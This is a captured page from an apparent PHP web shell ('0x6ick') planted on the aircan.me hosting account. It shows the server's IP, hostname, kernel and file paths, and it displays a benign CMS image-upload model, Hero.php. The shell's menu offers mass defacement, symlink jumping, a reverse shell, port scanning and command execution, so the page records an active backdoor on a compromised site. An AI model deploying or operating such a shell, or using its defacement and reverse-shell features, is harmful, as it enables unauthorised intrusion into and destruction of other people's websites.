Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
construcciones
/
admin
/
app
/
Models
/
Viewing: Hero.php
<?php class Hero extends BaseModel { protected string $table = 'hero_section'; protected array $fillable = [ 'subtitle', 'title_1', 'title_2', 'desc_1', 'desc_2', 'updated_at', ]; public function getData(): array { $hero = $this->db->query('SELECT * FROM hero_section WHERE id = 1 LIMIT 1')->fetch() ?: []; if ($hero) { $hero['images'] = $this->db->query('SELECT id, image_path FROM hero_images WHERE hero_id = 1 ORDER BY id ASC')->fetchAll(); } else { $hero['images'] = []; } return $hero; } public function updateData(array $data): bool { $data['updated_at'] = date('Y-m-d H:i:s'); return $this->update(1, $data); } public function addImages(array $files): void { $count = count($files['name'] ?? []); for ($i = 0; $i < $count; $i++) { if (($files['error'][$i] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { continue; } $file = [ 'name' => $files['name'][$i], 'type' => $files['type'][$i], 'tmp_name' => $files['tmp_name'][$i], 'error' => $files['error'][$i], 'size' => $files['size'][$i], ]; $path = $this->uploadImage($file); if ($path) { $st = $this->db->prepare("INSERT INTO hero_images (hero_id, image_path) VALUES (1, ?)"); $st->execute([$path]); } } } public function deleteImage(int $id): bool { $st = $this->db->prepare("SELECT image_path FROM hero_images WHERE id = ?"); $st->execute([$id]); $image = $st->fetch(); if ($image) { $this->deleteOldFile($image['image_path']); $st = $this->db->prepare("DELETE FROM hero_images WHERE id = ?"); return $st->execute([$id]); } return false; } public function uploadImage(array $file): ?string { if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return null; } $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp']; $mime = mime_content_type($file['tmp_name']); if (!isset($allowed[$mime])) return null; $filename = 'hero_' . date('YmdHis') . '_' . bin2hex(random_bytes(4)) . '.' . $allowed[$mime]; $directory = ROOT_PATH . '/storage/uploads/hero'; if (!is_dir($directory)) mkdir($directory, 0775, true); if (move_uploaded_file($file['tmp_name'], $directory . '/' . $filename)) { return 'storage/uploads/hero/' . $filename; } return null; } public function validImage(array $file): bool { if (empty($file['name'])) return true; $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if (in_array($extension, ['php', 'js', 'html', 'svg'], true)) return false; return in_array(mime_content_type($file['tmp_name']), ['image/jpeg', 'image/png', 'image/webp'], true); } private function deleteOldFile(?string $oldFile): void { if (!$oldFile || str_starts_with($oldFile, 'http')) return; $path = ROOT_PATH . '/' . ltrim($oldFile, '/'); if (is_file($path)) unlink($path); } }
Coded With 💗 by
0x6ick